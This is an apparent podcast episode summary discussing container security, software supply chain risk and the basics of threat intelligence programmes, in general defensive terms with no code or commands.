In this episode we discuss security and intelligence in modern-day technology platforms, concentrating on how to secure the impact that container and cloud environments have on the technology supply chain. Compliance and intelligence play a critical role in the application and development of supply chain risk. Specifically, when developers perform code commits and updates, we discuss the criticality of intelligence and compliance to ensure code is truthful, accurate, and complete.
Here are the 3 Topics We Cover in This Episode:
1) Containers and Virtualization Images Offer Repeatability But Also Potential for Compromise at Scale:
Containers give software developers the potential to establish an assembly line of repeatable, secure patterns because they are operating system agnostic. However, the upstream effort to harden the container and set the right images or configurations needs to be correct from the beginning. Simultaneously, mistakes can lead to a compromised container or host OS level that might impact the container.
Container configurations have a shared kernel with modular application containers and services on top. Therefore, security practitioners must be mindful of anything that can break out of that container. Furthermore, if there is a host OS-level hardening, they must ensure kernel-level memory doesn’t compromise and impact all the dependent layers.
2) Supply Chain Risk with Containers:
Supply chain risk in technology is challenging because developers generally borrow code from other developers, and they don’t check libraries and dependencies for security issues. In addition, contractual agreements aren’t capturing all the supply chain pipeline nuances. It’s hard enough to know what’s happening inside an enterprise network, let alone understand the provenance and the chain of custody.
Security issues can get injected into the end product when not following a strict process concerning container changes. “Defense in Depth” is a classic security principle that matters in securing containers such as application and configuration management. In addition, other aspects like source control, commit trail, and fingerprinting different kinds of artifacts are all checksums to ensure the correct update of code.
3) Threat Intelligence Fundamentals with Container Security:
A threat intelligence program needs to start by aligning with the business with the most prevalent threats. A banking site will have different threats than e-commerce, gaming, or crypt-currency exchange. Therefore, a threat intelligence program needs to be modular enough to scale to many types of threats as the business grows.
More tactically related to containers, developers can’t be tearing down containers as little work would get done if a malicious actor scans a container environment. However, if a threat intelligence team notices a regularity or repeatability with the scan attempts followed by authentication attempts to the environment, those types of intelligence alerts are fruitful.
Intelligence programs show clear value on highly attacked industries (manufacturing, health care, retail, finance). The challenge is if you put blinders on and think there isn’t a way to be attacked other than regular threat intelligence blogs.